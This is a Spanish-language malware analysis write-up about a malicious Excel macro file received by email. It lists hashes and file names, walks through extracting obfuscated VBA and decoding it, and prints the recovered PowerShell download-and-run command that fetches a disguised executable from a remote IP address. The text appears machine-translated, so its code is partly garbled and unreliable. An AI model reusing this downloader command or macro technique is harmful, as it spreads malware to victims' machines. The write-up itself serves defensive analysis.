Introducción
Ayer recibí en la bandeja de entrada de mi empresa un correo electrónico con un archivo .xlsm adjunto llamado D92724446.xlsm procedente de Clare588@78-83-77-53.spectrumnet.bg . Los motores AV centrales y locales no encontraron nada malicioso y un análisis multimotor obtuvo como resultado 0/57. Decidí investigar un poco más a fondo para confirmar que se trataba de un archivo malicioso y extraer al menos el código que imaginaba dentro de este documento.
Información general
Esta es alguna información general recopilada:
[plano]
Nombre:
D92724446.xlsm
MD5:
fea3ab857813c0d65cd0b6b6233a834b
SHA1:
64eef048efe86fe35f673fd2d853a8a727934e6c
SHA256:
75e3a4cd45c08ff242e2927fa3b4ee80858073aade84898040bfbb7847ef
profundo
768:qEIo/BPRS5t1dbQjlshORhynxvWXLUYJdGnSCk:qIJM8jl6nIP
Tamaño del archivo:
36,1 KB (36978 bytes)
Tipo de archivo:
Hoja de cálculo XML abierta de Office
Información total del virus:
Primera presentación:
-02-18 10:35:06UTC
Última presentación:
-02-19 08:58:57UTC
Otros nombres:
93D9B24583.xlsm
e94fcc43b0dc9c7eb350149b4ebdfd3d
61a47fa44dd55f5721ebe85aa83a32e6
I233185_486.xlsm
L335966_246.xlsm
271269885.xlsm
4501B81210.xlsm
e65fb3285617c7b4bbc833a466be6c42
5312970.xlsm
9D50B4390.xlsm
DDE1368393.xlsm
E30178611.xlsm
43c29faad6fc5984273afcc67593d802
FE731885.xlsm
C47394.xlsm
sospechoso.xls
090214399.xlsm
Q884674_740.xlsm
E015272_266.xlsm
U506714_083.xlsm
43925982.xlsm
8BB4D89313.xlsm.zip
82AC485705.xlsm
8abb99eb6078b658e05aece79337378a
0BF112.xlsm
[/plano]
Análisis estático
Comencé mi análisis echando un vistazo rápido al interior:
En el desplazamiento 0 podemos ver rápidamente 4 bytes que confirman el formato del archivo (50 4B 03 04). En este punto, intenté obtener más información y ver cómo estaba compuesto este documento:
Esto confirma rápidamente mis primeras sospechas. En el desplazamiento 0x000012f1 se encuentra un archivo .bin.
Avanzando un poco más, podemos intentar conseguir el código de estas instrucciones:
Se extrajo el código y se crearon diferentes archivos para clases y módulos en OfficeMalScannerVBAPROJECT.BIN-Macros.
Al abrir estos archivos con un editor de texto simple, inmediatamente encontré muchas instrucciones confusas, como se muestra en la imagen a continuación:
Sin embargo, después de un rápido análisis me di cuenta de que los módulos realmente importantes para extraer el código malicioso eran los números 11 y 14.
Esto se debe a que el módulo número 11 contiene las instrucciones para ejecutar el código ofuscado asignado a la variable denominada «FfdsfF» y desenmascarado mediante la llamada a función «NewQkeTzIIHM».
«NewQkeTzIIHM» toma un parámetro de entrada como cadena y devuelve una cadena.
Estas son sus principales instrucciones:
El -13 inmediatamente recuerda un bucle de desofuscación que emplea el algoritmo rot13.
En este punto, simplemente escribí algunas líneas de código vbs para extraer correctamente el contenido e imprimirlo en un archivo txt llamado salida.txt.
[plano]
Función WriteFile(sText)
Establecer objFSO = CreateObject(«Scripting.FileSystemObject»)
Establecer objMyFile = objFSO.OpenTextFile( «C:UsersEOSecDesktopoutput.txt», 8, verdadero, 0)
objMiArchivo.WriteLine(sText)
objMiArchivo.close()
Función final
tenue i,x,y
x = «pzq-X-]|«r `uryy;r…r-5[r«:owrp -`†€ rz;[r ;droPyvr{ 6;Q|«{y|nqSvyr54u }GB ;FC;?A@;Dx«rsr«rsstq€rrq…‡~;w}t4942aRZ]2iWVv|qsuv|VU;pno46H-r…}n{q-2aRZ]2iWVv|qsuv| VU;pno-2aRZ]2iWVv|qsuv|VU;r…rH-€ n -2aRZ]2iWVv|qsuv|VU;r…rH»
Para i = 1 a Len(x)
y = y + Chr(Asc(Medio(x, i, 1)) – 13)
Próximo
Escribir archivo(y)
[/plano]
Este es el código claro obtenido:
[plano]
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile(‘http://5.196.243.7/kwefewef/fgdsee/dxzq.jpg’,’%TEMP%JIOiodfhioIH.cab’); expanda %TEMP%JIOiodfhioIH.cab %TEMP%JIOiodfhioIH.exe; inicie %TEMP%JIOiodfhioIH.exe;
[/plano]
Y este el whois de la IP remota:
¡Conviértete en un ingeniero inverso certificado!
Obtenga capacitación práctica en vivo sobre análisis de malware desde cualquier lugar y conviértase en un analista certificado de ingeniería inversa. Comienza a aprender
inetnum 5.196.243.0 – 5.196.243.7nombre de red Just_Hostingpaís es decirdescr Sólo alojamientoadministrador-c OTC9-MADUROtecnología-c OTC9-RIPEestado PA ASIGNADOmnt-por OVH-MNTfuente MADURO # Filtrado
Se descarga un archivo llamado dxzq.jpg . En realidad, es un archivo CAB ( JIOiodfhioIH.cab) que luego se expande a JIOiodfhioIH.exe y se ejecuta.